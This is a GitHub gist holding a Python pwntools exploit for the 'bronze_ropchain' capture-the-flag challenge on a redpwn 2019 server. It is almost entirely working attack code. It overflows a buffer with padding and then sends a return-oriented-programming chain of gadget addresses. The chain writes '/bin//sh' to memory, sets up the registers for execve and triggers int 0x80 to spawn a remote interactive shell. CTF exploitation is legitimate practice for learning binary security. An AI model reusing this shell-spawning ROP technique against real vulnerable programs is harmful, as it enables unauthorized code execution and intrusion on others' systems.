Created
August 19, 2019 00:47
-
-
Save swt02026/2242a6ca64a200c5f3d9dcfe0a5aa422 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| from pwn import * | |
| r=remote('chall2.2019.redpwn.net', 4004) | |
| #r=process('/home/ubuntu/environment/bronze_ropchain') | |
| #raw_input() | |
| # Padding goes here | |
| p = 'a'*(0x18 +4) | |
| #p += struct.pack('<I', 0x080a8e86) # pop eax ; ret | |
| p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret | |
| p += '/bin' | |
| p += struct.pack('<I', 0x08064904) # mov eax, edx ; ret | |
| p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret | |
| p += struct.pack('<I', 0x080da060) # @ .data | |
| p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret | |
| #p += struct.pack('<I', 0x080a8e86) # pop eax ; ret | |
| p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret | |
| p += '//sh' | |
| p += struct.pack('<I', 0x08064904) # mov eax, edx ; ret | |
| p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret | |
| p += struct.pack('<I', 0x080da064) # @ .data + 4 | |
| p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret | |
| p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret | |
| p += struct.pack('<I', 0x080da068) # @ .data + 8 | |
| p += struct.pack('<I', 0x080565a0) # xor eax, eax ; ret | |
| p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret | |
| p += struct.pack('<I', 0x080481c9) # pop ebx ; ret | |
| p += struct.pack('<I', 0x080da060) # @ .data | |
| p += struct.pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret | |
| p += struct.pack('<I', 0x080da068) # @ .data + 8 | |
| p += struct.pack('<I', 0x080da060) # padding without overwrite ebx | |
| p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret | |
| p += struct.pack('<I', 0x080da068) # @ .data + 8 | |
| p += struct.pack('<I', 0x080565a0) # xor eax, eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret | |
| p += struct.pack('<I', 0x080495b3) # int 0x80 | |
| print(len(p)) | |
| r.sendlineafter('name?', p) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment